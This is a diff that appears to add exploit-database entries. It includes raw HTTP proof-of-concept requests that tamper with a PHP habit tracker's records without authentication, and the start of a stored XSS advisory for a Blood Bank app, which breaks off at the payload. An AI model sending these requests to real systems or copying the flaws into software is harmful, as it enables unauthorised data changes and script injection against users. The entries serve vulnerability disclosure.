+POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 108
+Origin: http://localhost
+DNT: 1
+Connection: close
+Referer: http://localhost/habit-tracker/home.php
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+date=1443-01-02&day=Monday&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes
+```
+
+### Update Tracker as Unauthenticated User
+
+To update a tracker, use the following request:
+
+```
+POST /habit-tracker/endpoint/update-tracker.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 121
+Origin: http://localhost
+DNT: 1
+Connection: close
+Referer: http://localhost/habit-tracker/home.php
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+tbl_tracker_id=5&date=1443-01-02&day=Monday&exercise=No&pray=Yes&read_book=No&vitamins=Yes&laundry=No&alcohol=No&meat=Yes
+```
+
+### Delete Tracker as Unauthenticated User:
+
+To delete a tracker, use the following request:
+
+```
+GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+DNT: 1
+Connection: close
+Referer: http://localhost/habit-tracker/home.php
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+```
+
+## Recommendations
+
+When using this tracking system, it is essential to update the application code to ensure that proper access controls are in place.
\ No newline at end of file
diff --git a/exploits/php/webapps/51955.txt b/exploits/php/webapps/51955.txt
new file mode 100644
index 000000000..d8bd39df4
--- /dev/null
+++ b/exploits/php/webapps/51955.txt
@@ -0,0 +1,56 @@
+# Exploit Title: Blood Bank v1.0 Stored Cross Site Scripting (XSS)
+# Date: 2023-11-14
+# Exploit Author: Ersin Erenler
+# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code
+# Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip
+# Version: 1.0
+# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0
+# CVE : CVE-2023-46020
+
+-------------------------------------------------------------------------------
+
+# Description:
+
+The parameters rename, remail, rphone, and rcity in the /file/updateprofile.php file of Code-Projects Blood Bank V1.0 are susceptible to Stored Cross-Site Scripting (XSS). This vulnerability arises due to insufficient input validation and sanitation of user-supplied data. An attacker can exploit this weakness by injecting malicious scripts into these parameters, which, when stored on the server, may be executed when other users view the affected user's profile.
+
+Vulnerable File: updateprofile.php
+
+Parameters: rename, remail, rphone, rcity
+
+# Proof of Concept:
+----------------------
+
+1. Intercept the POST request to updateprofile.php via Burp Suite
+2. Inject the payload to the vulnerable parameters
+3. Payload: ">